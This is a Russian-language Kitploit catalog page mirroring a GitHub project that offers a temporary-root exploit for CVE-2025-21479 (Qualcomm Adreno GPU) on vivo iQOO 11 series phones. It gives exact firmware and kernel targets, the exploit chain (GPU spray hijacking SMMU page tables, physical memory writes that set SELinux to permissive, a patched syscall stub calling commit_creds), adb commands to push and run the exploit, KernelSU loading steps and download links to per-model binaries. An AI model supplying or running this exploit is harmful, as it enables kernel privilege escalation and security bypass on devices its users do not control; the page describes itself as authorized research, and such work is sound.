Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-21479-iqoo11pro — Заметки по воспроизведению CVE-2025-21479 (Qualcomm Adreno GPU) для vivo iQOO 11 Pro (PD2254) — авторизованное исследование | Kitploit
Инструменты/GitHubGitHub/xianwan1314/cve-2025-21479-iqoo11pro
Безопасность AndroidПовышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияМобильная безопасностьАппаратная БезопасностьРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubxianwan1314/cve-2025-21479-iqoo11pro

cve-2025-21479-iqoo11pro

Заметки по воспроизведению CVE-2025-21479 (Qualcomm Adreno GPU) для vivo iQOO 11 Pro (PD2254) — авторизованное исследование

Репозиторий
12120 дней назадЕщё не проверено

CVE-2025-21479 Временный Root (серия iQOO 11)

Версия

ПунктЗначение
Устройствоvivo iQOO 11 Pro (PD2254 / V2254A)
СистемаAndroid 15, PD2254B_A_15.2.12.2.W10
Ядро5.15.178-g3dc7c01077b8-dirty
SoCSnapdragon 8 Gen 2 (SM8550 / kalama)
GPUAdreno 740, OpenGL ES 3.2 [email protected]

Поддерживаемые модели

Из-за ограничений текущего метода извлечение kallsyms во время выполнения не реализовано, поэтому, помимо трёх указанных версий, другие версии теоретически не подходят.

Справочные проекты

  • zhuowei/cheese (Quest 3/3S, Adreno 740)
  • ma4the/omae-wa-cheese-da (Galaxy Z Flip5, SM8550/Adreno 740 v675)

Процесс реализации

root@kitploit:~
GPU spray (перехват таблицы страниц SMMU, 27 кандидатов физических адресов)
  → произвольное чтение/запись физической памяти
  → SELinux enforcing → permissive (физическая запись selinux_state)
  → patch __arm64_sys_vhangup (syscall #58, в Android не вызывается)
      GPU напрямую записывает 96-байтовый stub (commit_creds(prepare_kernel_cred(NULL)))
  → fork дочернего процесса → syscall(58) → uid=0
  → setexeccon: запись /proc/self/attr/exec = "u:r:shell:s0"
  → exec root shell (uid=0, домен = u:r:shell:s0)

Запуск:

root@kitploit:~
adb push exploit /data/local/tmp/exploit
adb shell
chmod 755 /data/local/tmp/exploit
cd /data/local/tmp && ./exploit

Пример реализации

Управление Root-правами:

root@kitploit:~
find /data/app -type d | grep resukisu
/data/app/***/***/lib/arm64/libksud.so insmod kernelsu.ko

Примечания

  • Временный root: действует только в текущей оболочке; для повторного получения прав выйдите и запустите exploit заново
  • GPU spray — вероятностный процесс; при плохом состоянии устройства возможна неудача, перезагрузите устройство и повторите попытку
  • Применимо только к прошивкам Android 15 из списка поддерживаемых моделей; другие версии не проверялись

Отказ от ответственности

Данный проект предназначен исключительно для исследований в области безопасности и обучения; тестируйте только на собственных устройствах. Пользователь несёт полную ответственность за все последствия использования данного проекта, включая, помимо прочего, повреждение устройства, потерю данных и т. д. Не используйте данный проект в любых незаконных целях.

Скачать инструмент
МодельПрошивкаЯдроБинарник
iQOO 11 Pro (PD2254)PD2254B_A_15.2.12.2.W105.15.178-g3dc7c01077b8-dirtyexploit_11pro
iQOO 11s (PD2304)PD2304B_A_15.2.12.1.W105.15.178-g844f85161cd7-dirtyexploit_11s
iQOO 11 (PD2243)PD2243B_A_15.2.16.1.W105.15.178-g0ae61da50a34-dirtyexploit_11